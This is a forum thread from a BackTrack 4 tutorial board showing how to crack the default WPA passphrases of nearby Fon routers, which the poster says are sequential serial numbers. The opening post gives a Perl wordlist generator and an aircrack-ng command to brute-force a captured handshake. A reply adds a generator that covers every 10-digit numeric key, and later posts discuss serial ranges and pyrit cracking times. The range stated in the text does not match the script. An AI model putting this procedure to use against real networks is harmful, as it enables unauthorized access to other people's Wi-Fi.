|
|||||||
| BackTrack 4 Howto Tutorials and Howtos about BackTrack 4 (NOT for requesting tutorials or how to do anything) |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
||||
|
Hey Community,
In this little Tutorial i'm gonna show you, hot to Bruteforce nearby Fon Routers So the interesting thing which I note, is that a Fon AP's default WPA passphrase is it's serial number, printed under the box. These serial numbers are sequential, thus making it very easy to guess their entire range. So for this i use a little Perl Script, which generates a file, included all Numbers from 807200000 till 8702555555 Code:
#!/usr/bin/perl
$n = 8702000000;
while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
because there are million Posts about it.Then we Simply use Aircrack and start Bruteforcing aircrack-ng fon-01.cap -w /root/fon/numbers.txt So this is it Cracked.IF you have further questions feel free to a PM or visit my Blog. In German = My_0wn_Remote In English = my_english_remote I also created a littel Tutorial Video for this whole thing YouTube - How to Bruteforce a nearby WPA Fon Wlan [3] Maybee it is worth for the Video Section, i can't measure =) Reeth
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not." |
|
||||
|
hey or4n9e
yeah that could be possible, that it not fits in your country maybee they change the Serial Number in different Countries...but i don't think so... I also have 2 Fonera 2100 Routers but they all got S/N with 8072....Numbers...
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not." |
|
||||
|
Have a look through the various forums around the place, I can assure you that, like the man said, they do not all fall within the 8072 range.
That said, the sheer size of the serial key not withstanding, you could just compute the numerics for all the possibilities at that width of serial numbers (10^10 or something - it's early and my math-fu is weak without coffee). It wouldn't even be hard to do, so let me try hack something up while I write this post (it will be untested ):Code:
#!/usr/bin/perl
open(DICT, ">outputfile.txt") || die "Bugger: $!";
my $i = "0000000000";
while($i < 10000000000) {
my $j = sprintf("%010d", $i);
print DICT "$j\n";
$i++;
}
close(DICT);
That would work for any 10 numeric digit WPA key by the way, and removes the need for targeted mishaps like the original. Also it removes that terrible call to echo which would slow the generation down.
__________________
Never underestimate the power of human stupidity - it is like a force of nature, capable of destroying even the most well laid plans. |
|
||||
|
Quote:
you ment the first 3 ? because the range i did create was from 807200000 till 8702555555@Snalyer what kind of fon did you use ? What are the standard Ranges for Fon ? Fon+ ..... are there any correlations ?
__________________
„ I'd rather be hated for who I am,
than be loved for who I am not." |
|
||||
|
Quote:
How long does it take your pyrit box to get through that list (is it included in the timing stats we've already seen) ?
__________________
Never underestimate the power of human stupidity - it is like a force of nature, capable of destroying even the most well laid plans. |
|
||||
|
Quote:
Quote:
__________________
"... the link budget is not a problem, we intend on splitting the bill." |
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
|
|